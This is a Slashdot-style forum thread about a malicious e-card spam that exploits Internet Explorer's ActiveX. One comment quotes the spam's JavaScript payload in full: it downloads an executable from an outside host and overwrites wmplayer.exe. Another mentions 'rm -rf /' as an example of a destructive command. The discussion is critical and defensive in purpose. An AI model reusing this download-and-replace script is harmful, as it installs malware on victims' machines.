Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

I hate ecards

[jwthompson2 (749521)]

This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

---
Mod me down, I'm already -1...woot!

Turn off HTML viewing in your email client!

[turnstyle (588788)]

I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

It's an easy way to protect yourself from all sorts of stupid stuff.

Ahem, turn off HTML viewing in your email client NOW.

Re:Turn off HTML viewing in your email client!

[by Anonymous Coward]

But that's a cool feature!

What next? Should I stop using Outlook???

Re:Turn off HTML viewing in your email client!

[simp (25997)]

Switch off HTML formating for Outlook.

See http://support.microsoft.com/default.aspx?scid=kb; EN-US;307594 on how to do it.

Re:Turn off HTML viewing in your email client!

[JPriest (547211)]

There is a client called pocomail [pocomail.com] that I use that is pretty safe. It has an intuitive spam filter, you can script it to do about anything with mail, and it has a simple filter setup for sending messages from X to folder Y.

spam filter:
"viagra", +9
"herbal", +6
"natural", +6
"to be removed", +5
"free", +2
"!!!", +2

You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.

Re:Turn off HTML viewing in your email client!

[pldms (136522)]

There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,

Re:Turn off HTML viewing in your email client!

[misleb (129952)]

But in terms of real, non-technical end-users, HTML is what's out there.

The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.

95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).

-matthew

OR

[diablobynight (646304)]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account? And if your talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.

Re:OR

[RetroGeek (206522)]

You could just simply not view messages from people you don't know.

Otherwise known as a white list.

Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

And this is the real bad effect that SPAM has created. We no longer trust strangers.

Sigh...

Re:I hate ecards

[ONOIML8 (23262)]

"Of course as a Mac user I don't have much to worry about with this."

Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

Frightening

[JackBuckley (696547)]

This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.

Re:Frightening

[Alizarin Erythrosin (457981)]

Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

Re:Frightening

[harmonica (29841)]

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

Amazing, really

[mao che minh (611166)]

It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villians.

And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

You might remember me

[by Anonymous Coward]

Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"

Re:You might remember me

[ggvaidya (747058)]

... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

Virus vs. Spam

[the grace of R'hllor (530051)]

Because Viruses can do better with some effort.

MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

E-mail just can't beat those times.

Spam in Outlook

[DoorFrame (22108)]

I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user openning an attachment or clicking on an off-email link? Any examples?

Re:Spam in Outlook

[by Anonymous Coward]

1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.

Re:Spam in Outlook

[dave420-2 (748377)]

The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

Remember "security through obscurity"? Well, the reverse applies, too.

Re:Spam in Outlook

[MooCows (718367)]

This argument has been going on forever.
And, IMHO, is only partly correct.
Windows and it's apps have many "by design" security flaws.

Short list:
- Horrible data-binding in many apps (IE/Outlook/etc)
- Enabling scripts in emails to run in the local zone
- No warnings for insecure passwords
- NetBIOS open by default for the internet
- IIS, period
- Null sessions
- Password hashing flaw (l0pth)

Some of these are fixed, some are not.

Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.

The most frightening bit here

[Rope_a_Dope (522981)]

ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

Re:The most frightening bit here

[ggvaidya (747058)]

I think you have to be Administrator for the re-write to work. Then again, most of the people I know run as administrator, so ...

Re:The most frightening bit here

[bhtooefr (649901)]

There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled.

Re:The most frightening bit here

[CdBee (742846)]

"Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

(MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

Re:The most frightening bit here

[lordDallan (685707)]

The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

Re:Don't run ActiveX as Administrator, simple.

[jdhutchins (559010)]

Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

Spylog is not spyware!

[tgma (584406)]

While I commend the original article as an interesting dissection of an attempted attack via spam, the heading is a little sensational. It mentions Russian spyware sites, but the site in question is Spylog.com, a reputable Russian monitoring site. Not everything on the Russian internet is malicious, and Spylog does some good work on reporting statistics about the Russian internet.

Just a minor correction.

At what point

[GigsVT (208848)]

Does this stuff get treated like a virus/trojan, rather than legitimate business?

If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

People actually get pissed off when we tell them they can't have weatherbug on their computer.

Conclusions

[kyshtock (608605)]

I believe that there are at least 2 conclusions here:

1. Clicking can be dangerous.

2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, than it's time to change the security settings.

Stay on your toes

[J. Jacques (708438)]

This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.

I hate spam

[nycsubway (79012)]

I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)

Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

How can email on the internet remain free/cheap and still not allow spam to run rampant?

noHTML for Outlook Express

[TasosF (670724)]

Quote from that article:

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

Or alternatively,

you can use an HTML disabler like noHTML for Outlook Express [baxbex.com]

Ugly is what ugly does

[broothal (186066)]

This looks pretty ugly:

x.Open("GET", "http://adversting.co.uk/a.exe",0);

and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

Re:Ugly is what ugly does

[JCMay (158033)]

What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

German dialer spam gangs used "e-cards", too.

[DocSnyder (10755)]

About a year ago, German email users have been spammed with similar e-cards [heise.de], which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year [heise.de] to stop this kind of fraud.

Using Mozilla on Windows won't protect you ...

[by Anonymous Coward]

wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

My solution: I renamed wscript.exe and cscript.exe so they can't execute.

If you use Outlook for your mail..

[JasonUCF (601670)]

You need SpamBayes [sourceforge.net]. The beautiful folks behind it have included an Outlook plugin. Now you can knock your bayesian filter self out with a self contained easily run end-client solution. In smaller words, no need for anything fancy from your ISP, just install, plug, and play. In the few days I have used it my spam has literally dropped to 0. Spams are nailed before I even see them show up in the INBOX (it's that fast).

Go check it out. It's really, really, good, and free, as in, well, um, beer?

I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...

overwrites wmplayer.exe??

[p4ul13 (560810)]

Well ok; so it's not ALL bad then.

E-cards are EVIL

[rqqrtnb (753156)]

Why do people still insist on using e-cards?

They are spam harvesters. Nothing more.

I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

Do I need to attach a note to my emails?

If you are thinking of sending me an e-card:

• I will be changing my email address address again, much to the chagrin of everyone else.

• Since you have have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

• You are now limited to traditional (non 21st Century) forms of communication with me.

What possesses people to do it?

Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

Bastards.

My spam with full header database

[leoaugust (665240)]

.
I have been putting my spam with full headers here, [quicktopic.com] and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google so the results should show up for specific keywords.

If you are spam hunters, please be my guest and fry some spammers a***

.

Check out Qwik-Fix.

[autechre (121980)]

Remember Pivx Labs, the folks that used to host the "21 unpatched vulnerabilities in IE" page and has since switched to being a slight MS apologist? They've got a nice product which is (currently) free. What they basically did was to tighten down Windows via things from standard settings to registry tweaks to a degree which most users won't notice. Several of the recently discovered IE vulnerabilities wouldn't have worked, and Blaster wouldn't have worked either under these settings.

After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAffee (which is what UMBC machines should be using anyway).

I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).

Re:e-cards

[toasted_calamari (670180)]

What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

With regards to the article, thats definitly one of the nastiest browser exploits i've seen in a long time, makes me glad I don't use windows and IE.

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya (747058)]

That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

Re:It'd be scary if I ran my PC as Administrator..

[clester (744726)]

You mean it could overwrite /usr/bin/xmms?

Re:A little bit unfair to Outlook

[GigsVT (208848)]

How do you think Outlook displays mail? Last I checked, it embeds the IE control.

Re:Russian spyware.

[Chuck Bucket (142633)]

you must be new here.

CB

Re:Redndant, I know. Don't run as Administrator.

[krray (605395)]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Tell you what sparky -- YOU try that across a enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.

Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.

Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).

Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...

Re:Are there really better alternatives???

[jfengel (409917)]

Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

Still, having be written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.

Re:Are there really better alternatives???

[orthogonal (588627)]

The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

Fire{WHATEVER_WEEK_THIS_IS} doesn'tt, so far as I know do this:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://adversting.co.uk/a.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

Go to web-site, get a new OS!

And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop tho think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag?

To the contrary, they considered it a positive feature! Why? Because Visual Basic "programers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

I mean, Christ. This is just a travesty, and open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, bit I never knew javascript could be so bad.

I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

What the hell?